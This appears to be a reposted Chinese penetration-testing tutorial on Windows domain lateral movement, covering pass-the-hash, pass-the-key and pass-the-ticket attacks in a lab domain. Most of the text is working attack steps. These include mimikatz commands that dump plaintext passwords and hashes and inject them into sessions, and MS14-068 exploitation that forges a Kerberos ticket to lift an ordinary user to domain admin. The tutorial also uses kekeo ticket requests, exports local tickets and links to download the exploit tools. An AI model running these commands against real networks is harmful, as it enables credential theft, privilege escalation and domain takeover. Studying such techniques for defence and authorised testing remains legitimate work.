IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> 【内网安全】域横向PTH&PTK&PTT哈希票据传递 -> 正文阅读

[开发工具]【内网安全】域横向PTH&PTK&PTT哈希票据传递

Kerberos协议具体工作方法,在域中,简要介绍一下:
? 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket)
? 将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中TGT数据
? 然后客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测
? 检测成功之后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。

PTH (pass the hash) # 利用lm或者ntlm的值进行的渗透测试
PTT (pass the ticket) # 利用的票据凭证TGT进行的渗透测试
PTK (pass the key) # 利用的ekeys aes256进行的渗透测试(ekeys aes256可以通过mimikatz中sekurlsa::ekeys获取

windows系统LM Hash 及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows 2003以后,认证方式均为NTLM Hash

可以把票据理解为登录网站后留下来的cookie,或者说和别人建立连接的一个凭据在你电脑上,这时候你就可以用这个票据进行重新连接,票据就是好比cookie

PTH和PTK连接协议是一样的,PTT协议不同,它是kerberos协议。

PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash远程访问主机或者服务,而不提供明文密码。(也就是说不需要得到明文密码,只需要得到加密值就可以攻击)

如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击。

总结:KB2871997补丁后的影响(systeminfo可以查看补丁信息)
pth:没打补丁用户都可以连接,打了补丁只能administrator连接
ptk:打了补丁才能用户都可以连接,采用aes256连接
KB22871997是否真的能防御PTH攻击? - FreeBuf网络安全行业门户

# PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。

MS14-068基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780

? 域横向移动PTH传递-Mimikatz
? 域横向移动PTK传递-Mimikatz
? 域横向移动PTT传递-MS14068&kekeo&local
? 国产Ladon内网杀器测试验收-信息收集,连接等?


案例1-域横向移动PTH传递-Mimikatz

PTH传递就可以借助工具mimikatz,这款工具不仅是凭证的获取工具,就是获取明文密码的工具,还可以进行相关攻击,比如说PTH传递

PTH ntlm传递
未打补丁下的工作组及域连接:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7(假设知道域控上的hash)
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c(workgroup是连接本地用户)
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

\OWA2010CN-God.god.org(域控)

实验演示:

打开2008R2 x64 Webserver的powershell:

命令:
privilege::debug
sekurlsa::logonPasswords(获取明文密码)

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7(mimikatz运行后会弹出一个窗口cmd)
在弹出的窗口中输入dir \\192.168.3.21\c$(ip地址不识别的话可以换成计算机名)

案例2-域横向移动PTK传递-mimikatz

PTK aes256传递
打补丁后的工作组及域连接:
sekurlsa::ekeys #获取aes
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

PTK:必须打了补丁才能用户连接


?案例3-域横向移动PTT传递-ms14068漏洞&kekeo工具&本地

第一种利用漏洞:
能实现普通用户直接获取域控system权限

MS14-068 powershell执行

1.查看当前sid whoami/user
2.mimikatz # kerberos::purge???? ?? //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造(不用提升权限)
mimikatz # kerberos::list????????? ????? //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件名称 ? //将票据注入到内存中
3.利用ms14-068生成TGT数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
4.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
5.查看凭证列表 klist(当前计算机和哪些东西进行连接,如果要删除票据可以使用命令klist purge)
6.利用
dir \192.168.3.21\c$(或者net user连接)如果ip连接不了就可以用计算机名

这个票据传递的原理就是生成一个合法的连接请求,然后用mimikatz导入内存中,所以连接的时候就不用连接密码


第二种利用工具kekeo

1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用net use载入
dir \192.168.3.21\c$


第三种利用本地票据(需本地管理员权限)

其实就是一种伪造cookie的攻击思路,首先用mimikatz把本地的票据收集再导入内存

sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi(就相当于把以前的“cookie”弄出来,再看看还能不能用,凭据在十小时之内导出才有效)
总结:ptt传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据


案例4-国产Ladon内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

GitHub - k8gege/Ladon at v6.1
?

涉及资源:
https://github.com/k8gege/Ladon
https://github.com/gentilkiwi/kekeo/releases
https://github.com/abatchy17/indowsExploits/tree/master/MS14-068
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取码:xiao

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-09-14 13:33:52  更:2021-09-14 13:35:58 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/23 5:45:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计